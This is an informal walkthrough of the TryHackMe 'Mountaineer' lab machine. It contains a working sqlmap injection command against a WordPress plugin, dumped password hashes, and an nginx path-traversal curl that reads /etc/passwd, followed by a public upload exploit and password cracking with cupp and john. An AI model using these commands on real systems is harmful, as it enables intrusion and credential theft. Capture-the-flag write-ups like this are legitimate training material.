Mountaineer (THM)

Will you find the flags between all these mountains?

Hello Eveyone today we have Mountaineer which is a hard machine let's see what we can do.

Enumeration.

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 86:09:80:28:d4:ec:f1:f9:bc:a3:f7:bb:cc:0f:68:90 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNzmv/TK6UXAtIESme5E7W0pfj5dk+kPY3cMerOGVgcf9bNdQdGWEEABgXXUMsskQ4eQolhoIslOd2RToByLuxQ=
|   256 82:5a:2d:0c:77:83:7c:ea:ae:49:37:db:03:5a:03:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEdMUpyUtqgnN8X2w+jbTbgZLgZ03b5MqorlzQVmAleC
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Welcome to nginx!
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)

From here i do a lot of stuff from wpscan and fuffing and a lot of stuff i even extractred the database.

MontBlanc:$P$B5XtOtT1tfaQx.ZvNQIGAHw0XN30xh1
ChoOyu:$P$B8LM6vinNP2PP9S3dVRUNDDyJdgYAl/
K2:$P$BKBvlxfa9Wh9ZSblTYiYx0Ea00pNle0
admin:$P$BV.Ti3d.cRhWdsEkDtiloJB9JGxEPG0
Everest:$P$BZQ0YZAGs5N/7CuPTv6kaxNkgBUtmE1

Which was a valun from wpscan.

sqlmap -u "http://mountaineer.thm/wordpress/wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" -p time --risk=3 --level=5 -D wordpress -T wp_users -C user_login,user_pass --dump --hex  --technique=T --dbms=mysql

But no luck i was not able to find any password and by then i was so frustrated its been 3h to get all these and none of them got me anything.

But thanks to https://0xb0b.gitbook.io/writeups/tryhackme/2024/mountaineer

Mr bob i was inspire to search about misconfigure in Nginx it self. So after reading a bit on https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/nginx

i found that the application is misconfigure.

So it basiclly tricks the website to think that we want to access a file outisde of the web directory.

curl http://mountaineer.thm/wordpress/images../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
vagrant:x:1000:1000:vagrant:/home/vagrant:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
vboxadd:x:998:1::/var/run/vboxadd:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
dovecot:x:115:121:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:116:122:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
manaslu:x:1002:1002::/home/manaslu:/bin/bash
annapurna:x:1003:1003::/home/annapurna:/bin/bash
makalu:x:1004:1004::/home/makalu:/bin/bash
kangchenjunga:x:1006:1006::/home/kangchenjunga:/bin/bash
postfix:x:117:123::/var/spool/postfix:/usr/sbin/nologin
everest:x:1010:1010::/home/everest:/bin/bash
lhotse:x:1011:1011::/home/lhotse:/bin/bash
nanga:x:1012:1012::/home/nanga:/bin/bash
k2:x:1013:1013::/home/k2:/bin/bash

and from there we can enumerate the server for more info one of the file we can access is.

curl http://mountaineer.thm/wordpress/images../etc/nginx/sites-available/default which will give us more idea on the server configuration. And from there we can one more vhost we was not be aware of by the way i did enumeration about subdomains and vhost using gobuster.

So we only need to add this to the host file. and let's visit it to see what we have.

So from here i tried to bruteforce but it has rate limit so i belive that we can guss the password since we can not break the passwords nor bruteforce or maybe there is another way am not aware of.

I tried with most of them and luck me K2 works which i guess you can tell what the passwors is.

From there we can find two emails.

I tried to ssh using the password but it does not work. So i tried to login into wordpress for the user K2 and it actully works.

From here i can recall that we have an upload vuln if we have contributer access at least.

By this i search for an exploit and i fond this.

Exploits/Wordpress/CVE-2021-24145 at main · Hacker5preme/ExploitsGitHub

Which has work perfectlly.

Access shell as K2

this is quite simple we can use the same creds from the roundcube.

Acess as kangchenjunga

So here i stuck for a while we can see that once we login as K2 we can see an email to guy called. Lhotse Which we has access to his directory.

And here i search about this and i found it some sort of encrypted databse which hold some information we can use john to crack so i tride john with rockyou file but it does not work. Thanks to bob again i see that he uses tool called cupp which help to generate some password based on user information.

Shoutout again for bob. https://0xb0b.gitbook.io/writeups/tryhackme/2024/mountaineer#password-generation

GitHub - Mebus/cupp: Common User Passwords Profiler (CUPP)GitHub

So using this tool i provide the information. and it give me a wordlist.

And using that file with john i was able to crack it.

And from there we can access this website.

KeeWebKeeWeb

To see the file content just upload the file enter the key and it will open. ANd from there we can find the username and password for the user : kangchenjunga.

Shell as Root.

So once we login we will find the flag as well as note which actully make me laugh.

This guy does not want to be hacked so he put strong password but his friend miss it all up LOL 😂.

So as to became a root its quite simple really. So reading the note above we can tell that the root user use this guy account. So let's see.

Hmmmm is it really ??.

indded. So let's login as root.

conclusion.

At the end this machine was so fun it actully not that hard but there is a key point which actully was challenging such that fact that i spend 3h to use sqlmap to get all the users databae with nothing at the end and the real exploit was quite simple aslo in the crack file it was quite easy but using the person information to get the real password was actully so smart and a new idea i can use in future challenges. Finally i would like to thank and give a credit to bob he really help me thank you bob. Check his write up down show some love.

Mountaineer | Writeups0xb0b.gitbook.io